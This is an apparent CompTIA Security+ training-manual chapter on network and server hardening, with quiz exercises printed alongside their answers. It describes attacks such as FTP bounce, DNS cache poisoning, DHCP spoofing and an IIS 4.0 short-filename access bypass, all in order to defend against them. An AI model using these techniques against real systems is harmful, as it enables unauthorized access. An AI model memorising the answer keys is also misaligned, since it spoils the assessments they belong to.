An access control list (ACL) is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet. An ACL implements a certain type of security policy for an organization. For instance, if an organization doesnt want employees to use FTP across the Internet, the organization can institute a restriction by placing an access list on the corresponding interface. The access list would then enable the implementation of this policy. An access control list should not be considered a policy by itself. ACLs implement packet filtering. Packet filtering is the process of deciding the disposition of each packet that can possibly pass through a router. IP filtering provides the basic protection mechanism for a routing firewall device through inspection of packet contents. This process governs what traffic passes through the device, thereby potentially limiting access to each of the networks controlled by the firewall. The determination of such filtering rules and their placement within the network can be complex depending on the topology of the network. For a router that implements packet filtering, the routing process might have multiple points where ACLs are applied. Inbound data packets are typically inspected on arrival at the filtering device. Departing packets, on the other hand, are usually subject to filtering rules immediately before a packet is transmitted out of the device. Different rule sets might be used at each point where filtering is applied. If certain components of the organizations security policy cannot be implemented via ACLs, administrators should evaluate additional security tools, such as intrusion detection devices or proxies. Packet-filtering rules, implemented by ACLs, can be designed based on intrinsic or extrinsic information pertaining to a data packet. Intrinsic information is contained within the packet itself, such as source address, destination address, protocol, source port, destination port, packet length, and packet payload, which is the actual data. Extrinsic information exists outside of a data packet. This information can include the arrival/departure interface on the device, the context maintained by the firewall software that pertains to a packet, and the date and time of packet arrival or departure. In general, packet filters cannot reference extrinsic information. ACLs are generally designed to implement separate sets of rules for different interfaces, sometimes with separate sets for arriving and departing packets. By placing a given rule in the appropriate interfaces rule set, you are using extrinsic information in the rules design. Following are well-known best practices for designing filtering rules for new networks: ACLs typically implement implicit denials at the end of a rule set. When applied on an interface, an implicit denial causes all packets to be denied unless there are explicit permissions. Its a good practice to explicitly add the deny all rule to articulate the security policy of the organization more completely. Design antispoofing rules, and place them at the top of the ACL. Identify protocols, ports, and source and destination addresses that need to be serviced in your network. Make sure these requirements abide by your organizations security policy. Configure the filtering rule set of the ACL by protocol and by port. Collapse the matching protocols rows and the consecutive ports rows together into one new row that specifies a range. This reduces the number of rules, hence increasing processing efficiency. Place all permission rules between the antispoofing rules and the deny all rule at the end of the rule set.

Do it!
B-1:
Discussing network hardening

1 ____________ is a logical interface that is not tied to any physical interface.
Loopback
2 ____________ is a function of IP routing that allows the packet originator to influence routing decisions as the packet traverses networks.
Source routing
3 Smurf attacks can be thwarted by disallowing ____________ ____________ on routers.

IP-directed broadcasts
4 For best security on routers, never configure a loopback address. True or false?
False. Always configure a loopback address. The loopback interface allows you to access a device regardless of the status of the primary physical interface.
5 The SNMP ____________ community string can be used to make changes in a router configuration.
Read/Write
6 SNMP has two types of communities. Identify them from the list provided. A
B
Router Access Only Read Only Random Access Only Read/Write
C
D
7 ____________ is a useful feature to allow TCP data packets into your internal network, given that the data traffic is initiated from your internal network.
Filtering
Security baselines
1319
Disabling services and protocols

Explanation Many services are vulnerable to Internet-based attacks, which have caused nightmares for system administrators over the years. To support novice administrators, many server operating systems are now packaged with a variety of software and installers, which start these services automatically. Every service should be evaluated for need and risks. Any services that are unnecessary should be removed. Those that are required should be evaluated and installed in a way that lowers potential risks. As a system administrator, you must become familiar with such services and take appropriate precautions to mitigate the risks associated with them. RPC Remote Procedure Call (RPC) is one of the most commonly exploited services on the Internet today. RPC essentially permits a computer to execute a program on another computer. RPC Portmapper, used to launch reconnaissance attacks, returns information about all RPC network services configured to run on your host systems. When a distributed application requires RPC service, it should be allowed only through secure access methods such as VPN. Otherwise, RPC services should be disabled by blocking access on corresponding ports on the Internet border routers. Network File System (NFS), the UNIX-based file-sharing mechanism, is also vulnerable to such attacks and therefore should be blocked from the Internet. Web services Like RPC, Web services are also commonly exploited by Internet-based attacks. However, unlike with RPC, most companies need to permit the HTTP protocol for access to hosted Web services. Most of the risk associated with servicing Web traffic results from either the deployment of outdated Web servers or the use of third-party applications with documented vulnerabilities. System administrators can prevent such vulnerabilities with proper research and configuration. SMTP, SNMP, and FTP Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol (SNMP), and FTP services provide avenues for most of the remaining Internet-based attacks. SMTP is the industry-standard protocol used for electronic mail. Most SMTPspecific vulnerabilities result from unapplied or misapplied patches related to Sendmail installations or misconfigured Sendmail daemons. SNMP protocol is used for remote management of devices across a network. There is usually no reason to allow network management from the Internet. If system administrators must have remote network management capability, its suggested that SNMP be accomplished via VPN access. Anonymous FTP service allows anyone from the Internet to access internal FTP servers, either to upload or download data. Such practices should be disallowed unless there is a critical business need. Denial-of-service (DoS) attacks are commonly executed on systems that lack necessary configuration parameters. Such attacks have caused tremendous financial damage to many companies; the damage ranges from loss of business to even bankruptcy in certain cases. While its difficult to completely forestall any denial-of-service attack, carefully configuring your Internet devices can minimize the likelihood of being a target.

The most common reason for successful DoS attacks is the presence of unnecessary services running on network devices. For instance, Bootstrap Protocol, a service used to distribute IP addresses to clients, is almost never needed and should be disabled on all devices. Also, vulnerabilities associated with certain services can be fixed with patches provided by vendors. Certain FTP servers suffer from a buffer overflow vulnerability that can be easily fixed with patches. Administrators should disable all services that are not needed for Internet-based operations. Furthermore, services, such as DNS, that are necessary for Internet connectivity, should be properly reviewed, configured, and monitored. Internet Information Service (IIS) Microsoft IIS 4.0 and earlier has a security hole related to web files that dont use the DOS 8.3 naming convention. Files stored using the long file name convention can be accessed even if theyre restricted via IP address or through the use of SSL by simply requesting the file in DOS 8.3 format. For example, if a file is named MyConfidentialFile.htm, then a hacker can request MyConf~1.htm and be granted access to the file. This security hole has been fixed in IIS versions above 4.0. Do it!
B-2:
Managing services and protocols with Windows Server 2003 security templates Heres why
To apply a Windows Server 2003 security template and evaluate the results. Microsoft offers security templates at three primary levels: basic, secure, and high secure. The issues surrounding the use of these templates are unknown. Because the administrator is relying on Microsoft to secure the server, the settings are difficult to track.
Heres how
1 Choose Start, Run
2 Type mmc and press e 3 Choose File, My Console.msc

To open the previously created mmc console.
4 Choose File, Add/Remove Snap-in 5 Click Add 6 Select Security

Configuration and Analysis Under Snap-in.
7 Click Add Click Close 8 Click OK 9 Select and then right-click

Security Configuration and Analysis To display the shortcut menu.
Security baselines 10 Choose Open database

To open the Open database dialog box.
1321
11 In the File name box, enter My Database Click Open 12 Select the securedc.inf template Click Open 13 Right-click Security
Configuration and Analysis To import the template.
Choose Configure Computer Now Click OK 14 Right-click Security

Configuration and Analysis To use My Database.log as the log file.
Choose Analyze Computer Now Click OK 15 Right-click Security

Configuration and Analysis To use the My Database.log file.
Choose View Log File
Youll see a screen similar to the one below.
16 Explore the log file 17 Close My Console and save the changes 18 Close all other open windows
To see the changes made.

Do it!
B-3:
Reviewing services and protocols

1 What is the best practice for securing RPC services?
If a distributed application requires RPC, allow RPC only through secure access methods such as VPN. Otherwise, disable RPC by blocking access on corresponding ports on the Internet border routers.
2 Which of the following actions are safeguards against DoS attacks targeting services and protocols? A B C D
E
Disable services that are not needed for Internet-based operations. Review, configure, and monitor services that are necessary for Internet connectivity. Apply software patches to fix known vulnerabilities. Block access on corresponding ports on the Internet border routers. All of the above.
3 Most SMTP- and FTP-specific vulnerabilities stem from sloppy configuration and unapplied or misapplied patches. True or false?
True
Security baselines
1323
Topic C: Application hardening

This topic covers the following CompTIA Security+ exam objectives
# 3.5 Objective Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system Application Hardening Updates (Hotfixes, Service Packs, Patches) Web Servers E-mail Servers FTP (File Transfer Protocol) Servers DNS (Domain Name Service) Servers NNTP (Network News Transfer Protocol) Servers File / Print Servers DHCP (Dynamic Host Configuration Protocol) Servers Data Repositories Directory Services Databases
Updates, hot fixes, service packs, and patches

Explanation Applications that reside on networks must be hardened against intruder attacks. Many programs have security features built in to protect the resident computer against attack. In like fashion, servers and other network devices can be hardened against attack. As with operating systems and network operating systems, application updates, hot fixes, service packs, and patches require careful planning and testing prior to implementation. Updates are enhancements to the application, such as new features or functionality. Hotfixes are fixes to bugs that are discovered after a new application or version is released. Hot fixes typically replace specific files in the application with revised versions. Patches are temporary or quick fixes to the program. Patches are generally used to fix compatibility and minor operation issues and interface problems. Service packs are collections of hot fixes and patches bundled together and provided at fairly regular intervals. To protect your network from bugs or security vulnerabilities, upgrade all application software to the latest versions, and install the latest service packs and security patches. Vendors typically announce new version releases and patches on their Web sites or through e-mail notices. Remember to test these updates on non-production equipment before implementing them in a live production environment.
1324 CompTIA Security+ Certification Web servers

There are more attacks and vulnerabilities associated with Web servers than there are for any other type of server. The problem stems from the fact that a Web server is designed to make information accessible, rather than to protect it. Software companies only add to the problem by creating default installations that turn on unneeded services, rather than enabling only the basic services and forcing administrators to turn services on as needed. With that in mind, this section briefly discusses some high-level best practices for securing Web servers. Isolating a Web server on a DMZ A public Web server host is a computer intended for public access. This means that information stored on a Web server can be accessed by many people from locations all over the world. Regardless of how well the host computer and its application software are configured, there is always the chance that someone will discover a new vulnerability, exploit it, and gain unauthorized access to the Web server host. If this occurs, administrators need to prevent the following subsequent events: The intruder is able to observe or capture network traffic that is flowing between internal hosts. Such traffic might include authentication information, proprietary business information, personnel data, and many other kinds of sensitive data. The intruder is able to access internal hosts or to obtain detailed information about the system and its components. To guard against such threats, the public Web server host must be isolated from your internal network and its traffic. An example is shown in Exhibit 13-2.
Exhibit 13-2: Isolating a Web server on a DMZ Configuring a Web server for access privileges Most operating systems for Web server hosts can be configured for access privileges for files, devices, and other data or code objects stored on a host. Any information that your Web server can access by using these controls can potentially be distributed to all users accessing the public Web site. The Web server software is likely to provide additional object, device, and file access controls specific to its operation. Taking the following two perspectives, administrators need to consider how best to configure access controls to protect information stored on the same hardware as your public Web server: To limit the access to the Web server software To apply access controls specific to the Web server where more detailed levels of access control are required Properly configured access controls can prevent the disclosure of sensitive or restricted information that is not intended for public dissemination. In addition, access controls can limit resource use in the event of a DoS attack against your public Web site.
Security baselines Identifying and enabling Web-server-specific logging tools
1325
Logging can help administrators identify the sources of attacks as well as other problems and can help indicate the appropriate actions to take to prevent such events from reoccurring. On many servers, the Web service is among the most active and accessible. Considering security implications A Web server listens for a request and responds by transmitting the specified file to the requestor. The Web server might invoke additional mechanisms to execute programs or to process user-supplied data, producing customized information in response to a request. Examples of these mechanisms include Common Gateway Interface (CGI) scripts and server plug-ins. For example, CGI scripts can be used to interface with search engines and databases, create dynamic Web pages, and respond to user input. Because these features allow outsiders to upload data to the server, administrators need to assess the security risks and implications before applying such components. Configuring authentication and encryption The public Web server may need to support a range of technologies for identifying and authenticating users who may have different privileges for accessing information. Some of these technologies are based on encryption technology, providing a secure channel between a Web browser client and a Web server. Examples of such tools include Secure Sockets Layer (SSL), Secure Hypertext Transport Protocol (S-HTTP), and Secure Electronic Transaction (SET). Before placing any sensitive or restricted information on a public Web server, administrators need to determine the specific security and protection requirements and confirm that the available technologies can meet these requirements.
E-mail servers
E-mail is arguably considered the most important service to protect, considering its overall impact on the operations of any given organization. Companies often have e-mail from the Internet directly entering their e-mail servers for delivery to internal users. There are serious risks associated with the ability to receive e-mail from the outside world. The widespread adoption of e-mail through the years has been accompanied by the development of malicious code such as e-mail viruses and attacks. E-mail has enabled attackers to distribute harmful content to the internal network. An attacker can easily circumvent the protection offered by a firewall by tunneling through the e-mail protocol because a typical firewall does not inspect e-mail and its contents. Attachments with malicious contents In such attacks, the attacker typically tries to get the user to activate an attachment to execute its malicious contents. Although system administrators are commonly blocking files with certain extensions, attackers can overcome such precautions by renaming extensions (such as renaming an .exe extension as .bat). Furthermore, such malicious attacks could try to take advantage of the trust relationship between users, whereby, if a user activates an attachment, the attachment could trigger the sending of malicious code to other colleagues in the victims address book. Worms, such as AnnaKournikova and Melissa, take advantage of such capabilities.

E-mails with abnormal MIME headers MIME headers contain information about an e-mail message, such as the subject line, date, or file name. The Nimda virus is a commonly known virus that exploits the vulnerability caused by distorted MIME headers. This exploitation uses a malformed MIME header, which tells Outlook Express that the attached infectious file is a WAV file. This allows the worm to be executed automatically. Because there is no need for the user to explicitly activate the attachment, when the Nimda virus was first released, it caused extensive damage to corporations all over the globe. Also, certain vulnerabilities associated with Outlook Expresss date and file-name fields enable attackers to embed malicious code in such headers in an attempt to execute buffer overflow attacks on the victim system. Scripts embedded into HTML-enabled mail The use of HTML mail enables attackers to embed malicious HTML script and JavaScript code within the e-mail, which is then activated as soon as the e-mail is opened. Because such attacks do not use explicit attachments, they are hard to detect with conventional file-checking mechanisms. Such vulnerabilities can be exploited by e-mail to attack corporate resources, inject dangerous worms, and enable the execution of system functions such as reading, writing, and deleting files. Countermeasures The following defense mechanisms can help administrators protect systems against the aforementioned vulnerabilities: The first defense against such e-mail attacks, as in all other attacks, is to make sure that the e-mail server has the latest software updates and patches. One of the best practices for corporate e-mail connectivity is to deploy a dedicated e-mail relay (gateway) server, which sits in a protected area (DMZ), between the internal network and the Internet. The e-mail content-filtering mechanisms available in many e-mail gateway products allow a security administrator to create rules to search for key words and phrases and specific types of file attachments. Deployment of virus-scanning tools on the server can prevent viruses from making their way to the desktops. Although new viruses are engineered on an almost daily basis, virus programs with automatically updated signature files can be very effective against such threats. Administrators can also take advantage of attachment-checking mechanisms on the server. Such tools can be activated on the server to block suspicious file types that might contain malicious contents. Examples of such files are .exe or .vbs files. HTML Active Content removal is another defense mechanism that can filter emails with HTML tags and attributes that are used to execute malicious code.
Security baselines
1327
FTP servers
File Transfer Protocol (FTP) is used to transfer files between a workstation and an FTP server. When ftp appears in a URL, it means that the user is connecting to a file server to either upload or download a file. Most FTP servers require the user to log on to the server to transfer files. The original specification for FTP contains a number of mechanisms that can be used to compromise network security. The following sections list the vulnerabilities associated with FTP. Protecting against bouncebacks FTP, as specified in the RFC standard 959, presents a security breach for attacking wellknown network services on a remote server by using the FTP service on a third-party server. The attack involves sending an FTP PORT command to an FTP server containing the network address and the port number of the server or service being attacked. The attacker can instruct the FTP server to send a file to the service being attacked on the victim system. Such a file may contain commands relevant to the service being attacked (such as SMTP). Using the FTP server to connect to the service on the attacked machine, rather than connecting directly, makes tracking down the attacker difficult. For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to the attacked servers SMTP port and upload the file containing SMTP commands to the victim machine. This may allow the client to forge mail on the third machine without making a direct connection; this makes it difficult to track the attacker. TCP port numbers in the range 0 to 1023 are reserved for well-known services such as mail, Telnet, and FTP control connections. The original FTP specification makes no restrictions on the TCP port number used for the data connection. Therefore, using the proxy FTP scenario described here, attackers can instruct an FTP server to attack a wellknown service on the victim machine. To prevent such attacks, administrators should configure their servers not to open data connections to TCP ports lower than 1024. A server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type 504 (Command not implemented for that parameter). Disabling the PORT command and using proper file protections to prevent attackers from executing unauthorized transfer of files are other solutions for preventing bounceback attacks. However, disabling the PORT command also prevents proxy FTP, which may be required in certain situations. Restricting areas System administrators may want to restrict access to FTP servers that store confidential or corporate data. These restrictions could be set based on the network address of the client making the file transfer request. In such cases, before allowing the transfer of restricted files, the server should confirm that the network address of the client making the request on both the control connection and the data connection is within the organizations address space. Checking the address range for both the control and data connections protects the server from situations in which the server establishes a control connection with a trusted host but the data connection is misdirected. Using network addresses to establish FTP control and data connections leaves the FTP server vulnerable to IP spoofing attacks. In such cases, the attacker could assume a trusted IP address to download restricted files. Using strong authentication mechanisms can prevent such risks.

Protecting user names and passwords The standard FTP specification sends passwords in clear text by using the PASS command. FTP clients and servers should utilize alternate authentication mechanisms to avoid attempts to intercept clear-text passwords. To minimize the risk of brute-force password guessing, system administrators should configure FTP servers to limit the number of allowed attempts for a legitimate password. The server should terminate the control connection with the client after a certain number of attempts. In addition, to diminish the efficiency of a brute-force attack, system administrators should configure FTP servers to impose a five-second delay before replying to an invalid PASS command. An intruder may attempt to initiate multiple concurrent control connections to an FTP server to overcome such mechanisms. To be protected from this, the server can be configured either to limit the total possible number of control connections or to try to detect suspicious activity across sessions and refuse further connections from the site. Furthermore, standard FTP specifications specify an error response to the USER command when the user name is rejected. If the user name is valid and a password is required, FTP returns a different response. To prevent a malicious client from determining valid user names through persistent attempts, its suggested that FTP servers be configured to return the same response to the USER command, prompting for a password and then rejecting the combination of user name and password for an invalid user name. Port stealing Most operating systems assign dynamic port numbers in increasing order. By observing port assignments, an attacker can predict the next port to be used by the server. The attacker can make a connection to this port, preventing another legitimate client from making a transfer. Also using this method, the attacker can steal a file meant for a legitimate user or insert forged data into a stream thought to come from an authenticated client. System administrators can prevent these problems by configuring the server OS to deploy random port assignment algorithms. Other documented vulnerabilities The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication, and remote command execution allows clients to execute arbitrary commands on the server. Such services should not be deployed unless there is a legitimate business need.
Security baselines Do it!
1329
C-1:
Discussing Web, e-mail, and FTP server security

1 Some of the Web server security options that should be exercised before deploying the server include:
A B C D E
Use file-system access controls on server files and directories that are not for public viewing. Use Web server logging. Verify the safety of any types of CGI scripts and plug-ins that are executed on the Web server. Isolate the Web server on a DMZ. Use authentication and encryption technologies as necessary, including SSL and S-HTTP.
2 List some of the ways attackers can affect networks or hosts with e-mail.
Attacks can be launched by using attachments that contain viruses or other malicious code, by using abnormal MIME headers, or by using malicious scripts embedded in HTML e-mail.
3 The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication. True or false?
True
4 An attack by which the attacker uses a third-party FTP server to connect to a service on the victim machine, rather than connecting directly, is known as ___________.
bounceback
5 An FTP server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type ___________.
504
1330 CompTIA Security+ Certification DNS servers

Explanation Computers translate names into IP addresses in a process transparent to the end user. This process relies on a system of servers collectively known as the Domain Name Service (DNS). DNS stores data linking domain names with IP addresses. Each domain name server stores a limited set of names and numbers. All domain name servers are linked by a series of 13 root servers that coordinate the data and allow users to find the server that identifies the site they want to reach. One of the root servers, designated the master root, maintains the master copy of the coordination file, called the root zone file. The other 12 servers maintain copies of the file provided by the authoritative root server and make the file available to the rest of the domain name servers. The domain name servers are organized into a hierarchy that parallels the organization of the domain names. Specifically, the 13 root servers maintain authoritative information about the top-level domains (TLDs). In turn, each TLD provides authoritative domain name information for the second-level domains in its zone, while those second-level domains provide domain name services for resources in their zones. DNS is a very common target for attackers across the Internet. The following sections discuss some documented vulnerabilities associated with DNS. Inaccurate data on IP address ownership Without accurate information on the ownership of IP addresses, it becomes difficult to separate attackers from innocent users. Although the DNS data on recently assigned addresses is considered accurate, data on older blocks is often outdated. Furthermore, suballocations of IP blocks are often not tracked; this can delay identifying and contacting the source of a problem. For instance, for a company such as IBM, which owns a Class A IP address space, it could take days to find out the source of a packet flood from a suballocated IP address space within the organization. Including contact information for suballocations in the Internet Assigned Numbers Authority (IANA) database would speed this process up. Regional address registries, ISPs, and DNS server operators should update information as often as possible to avoid such problems. Customer registry communication An attacker could potentially initiate a forged request to change the information on a domain name, resulting in traffic destined to that name being routed to a bogus address. The misdirected traffic would then allow the attacker to collect personal or confidential information, such as credit card numbers, or cause users to download viruses or Trojan horse software. The use of secure encrypted communication in this process could reduce this risk. DNS spoofing and cache poisoning Another common security threat within the DNS is spoofing, which occurs when someone intercepts a query to a domain name server and replies with bogus information, resulting in a misdirection of the user. When the domain name server maintains a record of the bogus destination and uses it to answer later queries, this process is known as cache poisoning. An example is shown in Exhibit 13-3.
Security baselines
1331
Exhibit 13-3: DNS servers Many DNS servers are vulnerable to DNS spoof attacks. For instance, servers that use obsolete versions of BIND, the most common DNS software, are good examples. Its estimated that roughly 12% of DNS servers use versions of BIND that makes them targets for DNS spoof and buffer overflow attacks. Upgrading DNS servers with more current versions of BIND can mitigate such risks. Outdated root.hints file The root.hints file allows a given DNS server to locate the 13 root servers by address. Although its very uncommon, the addresses of these root servers sometimes change. Users who do not keep their root.hints file updated can send queries to addresses that no longer host root servers.

Recursive queries Configuring servers to perform recursive queries also increases the risk of spoofing. In a recursive query, when a client queries a domain name server and the server cannot answer that query from its cache, the server queries one or more servers up the DNS tree and forwards the answer to the client, rather than handing off the query to the other servers. Exhibit 13-4 illustrates the Quick Time screen that allows the user to decide which files can be downloaded and when.
Exhibit 13-4: Deciding which files to download Each packet used in a recursive query includes a tracking number. Hackers monitoring a domain name server can predict the next tracking number in a sequence and send a packet with that number to spoof the response from a legitimate name server. DNS server administrators can mitigate such risks by making sure they have the most updated versions of BIND. Denial-of-service attacks Like other Internet servers, DNS servers are also targeted by DoS attacks. Because of their importance, the root servers typically make a good target for DoS attacks. However, because of the critical role they play for the functioning of the Internet, the root servers are configured with the most secure software and configuration parameters, making it very hard for attackers to take advantage of them. Deployment of real-time monitoring tools enables administrators to identify and quickly block such malicious attempts.
Security baselines
1333
NNTP servers
Network News Transfer Protocol (NNTP) is used to deliver news articles to users on the Internet. NNTP works in much the same way as e-mail does, except messages are delivered to newsgroups, not directly to end users. Newsgroups act as a storage or deposit area for messages that follow a common theme or deal with a common subject matter. A news client instead of an e-mail client is used to read these messages. To gain access to news postings, a user needs access to a news server. These news servers exchange messages by passing on any new messages they receive to other servers down the line. This process is very slow, and it can often take days to circulate a new message to all of the news servers on the system. In the recent past, this type of news application has lost a good deal of its appeal. Many individuals post news articles of dubious use to get a self-serving point across to a large group of people. This spamming of users and user groups has made the use of newsgroups less appealing. Typically, the NNTP server runs as a background process on one host and accepts connections from other hosts on the LAN. NNTP servers, while on a network, have similar vulnerabilities as other network services. Proper authentication mechanisms, disabling of unneeded services, anti-virus scanners, and application of relevant software and OS patches are effective methods of preventing attacks.

Do it!
C-2:
Discussing DNS and NNTP servers

1 Out-of-date entries on DNS servers could cause a request to look up a host address and return an incorrect IP address for that host. True or false?
True
2 Configuring DNS servers to perform recursive queries also increases the risk of ___________.
spoofing
3 Common security threats to the DNS server include:

A
Cache poisoning Ping of death DNS spoofing DoS attacks Buffer overflow attacks All of the above
B
C D E
4 NNTP is used to deliver news articles to users on the Internet. True or false?
True
5 Typically, the NNTP server runs as a _______________ process on one host and accepts connections from other hosts on the LAN.
background
6 To prevent attacks on NNTP servers: A B C D

E
Deploy authentication mechanisms. Disable unneeded services. Install security patches. Install a virus scanner. All of the above.
Security baselines
1335
File and print servers

Explanation File and print servers are very important components of todays corporate networks. Its very hard to imagine an organization without file and print sharing capabilities. Because of their service role, its common for servers to store many of an organizations most valuable and confidential information resources. Security breaches on a network server can result in the disclosure of critical information or the loss of a capability that can affect the entire organization. Therefore, securing network servers should be a significant part of your network and information security strategy. Offering only essential network and OS services on a server Services are especially important because each added service might introduce new vulnerabilities to the system. Ideally, each network service should have a dedicated host. This setup enables the system administrator to configure the server based on the security requirements of the service running on it. Its important to make sure that the services are administered separately from each other to minimize conflicts between system administrators. Reducing the number of services also reduces the logging and monitoring activities, and thus optimizes resource utilization. System administrators should first determine which services need to be activated on the system. These services may include shared file sharing services, network configuration services (such as DNS or DHCP), printing services, application services, web services, and so on. Given alternative ways of providing the same system, system administrators should always choose the most secure method of accessing and maintaining a system. For example, on UNIX systems, Secure Shell (SSH) offers a more secure way of conducting remote system maintenance than does RSH, which uses IP addressing for authentication. After determining necessary services, system administrators need to ensure that only those services are activated. All the unneeded services, including the ones offered by the system kernel that may be running by default on the server, should be disabled. Finally, system administrators need to ensure that all unused open network ports on the server are eliminated because each open port is a potential target for attackers. Configuring servers for user authentication Unauthorized users can jeopardize the security of information that is stored on a computer or accessible from that computer. To prevent unauthorized users from jeopardizing the network resources and data, system administrators must configure proper authentication mechanisms. If available, its advisable to configure hardwarebased authentication such as Basic Input/Output System (BIOS) password authentication. Administrators should also remove all obsolete, default, and unneeded accounts to prevent their use by attackers. User groups and user accounts should be created based on the organizations security policy. Servers should be configured to deny login after a number of failed attempts, as well as require authentication after a period of inactivity. The authentication mechanisms of the individual services configured on a server should also be configured and deployed. Configuring server operating systems Configuring controls for server operating systems can minimize risks associated with intentional or unintentional acts that might damage system resources. Its also suggested that administrators configure file encryption capabilities for sensitive data.

Managing logging and other data collection mechanisms Collecting data generated by system, network, application, and user activities is essential for analyzing the security of the information assets and detecting signs of suspicious and unexpected behavior. Log files contain information about past activities. Administrators should identify the logging mechanisms and log types (system, file access, process, network, application-specific, and so forth) available for each asset, and identify the data recorded within each log. These mechanisms should monitor and inspect system resource utilization, network traffic, and file access, as well as scan for viruses and verify file and data integrity. Configuring servers for file backups Finally, because of the nature of information stored on file and print servers, system administrators should conduct periodic backups to avoid loss of data.
DHCP servers
Dynamic Host Configuration Protocol (DHCP) is a protocol for assigning dynamic IP addresses to devices on a network. With dynamic addressing, a device can have a different IP address every time it connects to the network. Dynamic addressing simplifies network administration because the software keeps track of IP addresses rather than requiring an administrator to manage the task. Although its a very useful tool that reduces the administrative burden, DHCP, like most Internet applications, has no security provisions and thus offers opportunities for attackers within an organization. Because DHCP is a broadcast-based protocol, a malicious user can set up a sniffer program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information. This information enables an attacker to gain unauthorized access to the network and the resources that reside on it. Because of the lack of security provisions for DHCP, its possible for a malicious user to configure an unauthorized DHCP server in an attempt to spoof the official DHCP server on the network. The original DHCP specification (RFC 2131) supports the use of redundant DHCP servers on the network. Although most clients listen to the last server (legitimate DHCP server) that they received a lease from, its possible for new clients on the network to fall into this trap and receive bogus network configuration information from the attacker. Furthermore, the attacker can launch a DoS attack against the DHCP server, either depleting the pool of available addresses on the server or consuming the resources of the DHCP server and making it unresponsive to client requests. By using such methods, an attacker can prevent users from accessing the network, or an attacker can provide false information about key resources and redirect users to bogus name servers, such as the attackers machine. The attacker could even provide his own IP address as a default gateway to intercept such private or confidential information as passwords.
Security baselines
1337
Following are steps that administrators can take to prevent such attacks from taking place on their networks: Its possible to assign permanent addresses with DHCP. This requires the administrator to collect the Media Access Control (MAC) addresses of all computers on the network and bind those addresses to corresponding IP addresses. However, this task introduces a substantial administrative burden, especially as the network grows. A less secure method is to use dynamic addressing but monitor the log files generated by DHCP, looking for new MAC addresses that can potentially belong to a malicious user. An administrator could also configure the DHCP server to force stations with new MAC addresses on the network to register with the DHCP server. Intrusion detection tools can detect the existence of a new DHCP server (attackers machine) on the network and notify the administrator of this fact. Its also extremely important to have the latest software and patches on the server to minimize risks associated with DHCP-related attacks. Do it!
C-3:
Discussing file, print, and DHCP servers

1 List three measures you can take to secure a file or print server.
Answer may include:
Implement user authentication. Enforce strong user names and passwords. Perform regular account maintenance. Use file encryption where possible. Enable logging.
2 DHCP is a protocol for assigning static IP addresses to devices on a network. True or false?
False. DHCP assigns dynamic IP addresses.
3 An attack that allows a hacker to provide user computer stations with bogus IP address information, such as default gateway and DNS server information, uses the ________ service to execute the attack.
DHCP
4 Because DHCP is a broadcast-based protocol, a malicious user can set up a ________ program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information.
sniffer
1338 CompTIA Security+ Certification Data repositories

Explanation As the name suggests, a data repository is the place within an organization where data is stored for both archiving and user access. These repositories contain an organizations most valuable assets in terms of information. Just as an organization would not leave its file room unsecured, data repositories must be carefully protected. Baseline security policies must be developed to secure the repositories and to allow only those people with a need to know access to these valuable and sometimes vulnerable assets.
Directory services
The Lightweight Directory Access Protocol (LDAP) is the industry-standard protocol for providing networking directory services for the TCP/IP model. LDAP can be used to store and locate information about entities, such as organizations, individuals, and other network resources, such as file systems, applications, and configuration information. An LDAP directory is essentially a special kind of database that stores information. Its based on a simple tree-like hierarchy, called a Directory Information Tree (DIT). It starts with a root or source directory, such as a company domain, and branches out to more specific layers, such as departments, then individuals, and so on. Because LDAP is a network protocol for directory services, like other network protocols, its subject to attacks from within the network as well as remote attacks. The security threats to LDAP can be categorized into two groups: directory-service-oriented threats and nondirectory-service-oriented threats: Directory-service-oriented threats include the following: Unauthorized access to data by monitoring or spoofing authorized users operations. Unauthorized access to resources by physically taking over authenticated connections and sessions. Unauthorized modification or deletion of data or configuration parameters. Spoofing of directory services: Such attacks are employed to gain access to sensitive information. They may involve deceiving valid users with a faked directory, or interjecting misleading information into the communications session between the client and the real server. Excessive use of resources. Nondirectory-service-oriented threats include the following: Common network-based attacks against the LDAP servers, including the operating system and opening ports, processes, and services running on the hosts, to compromise the availability of resources. This is accomplished by viruses, worms, Trojan horses, and so forth. Attacks against the hosts by physically accessing the resources (operating system, files and directories, peripheral equipment, and so forth). Attacks against the back-end databases that provide directory services.
Security baselines LDAP authentication and authorization
1339
LDAP is engineered based on a client-server model that implements two key processes: authentication and authorization. To access the LDAP directory service, the LDAP client must first authenticate itself to the LDAP server. Once the authentication is completed, the server decides which resources, applications, and services are accessible by the client. This is the authorization process. LDAP implements three kinds of authentication methods: Anonymous authentication Simple authentication Simple Authentication and Security Layer (SASL) for LDAPv3 (Kerberos 4 for LDAP v2) The anonymous authentication occurs when no specific authentication method has been chosen. Under such circumstances, the client connects to the server as anonymous, provided that the server allows anonymous connections and allows certain data access for anonymous users. The simple authentication method is to send the LDAP server the authentication field with only the clients password in plaintext. Certainly, this mechanism has security problems because the password is sent in plaintext and is readable if tampered with from the network. To prevent the password from being exposed when simple authentication is used, communications between client and server should occur through a secure channel, such as SSL. Without an underlying secure method of transferal, the simple authentication method is highly vulnerable and should be disabled. SASL is the most secure type of method because it deploys an exchange of encrypted authentication data. Establishing secure requests and responses between the client and the server is just as important as the authentication and authorization processes. Such communication should take place through secure channels or sockets, such as SSL. Currently, most LDAP servers have this capability. To establish SSL connections, a port number should be specified to run the service on the LDAP server. Generally, the LDAP server uses port 636 as a standard SSL socket number of LDAP for TCP and UDP. The directory server can also support custom sockets. But the client has to identify the appropriate socket to access the directory services on the server through SSL.
Databases
The criticality of securing a database depends on a variety of factors, including the degree of confidentiality of the stored data and the access requirements as they relate to day-to-day operations of an organization. Data must be available to authorized people on a continuous basis so they can make intelligent business decisions. Databases can be vulnerable to attacks because of a number of reasons, including their complex structure, misconfiguration, or insecure password storage. The following sections cover general principles of security that should be enforced to protect databases from malicious acts.

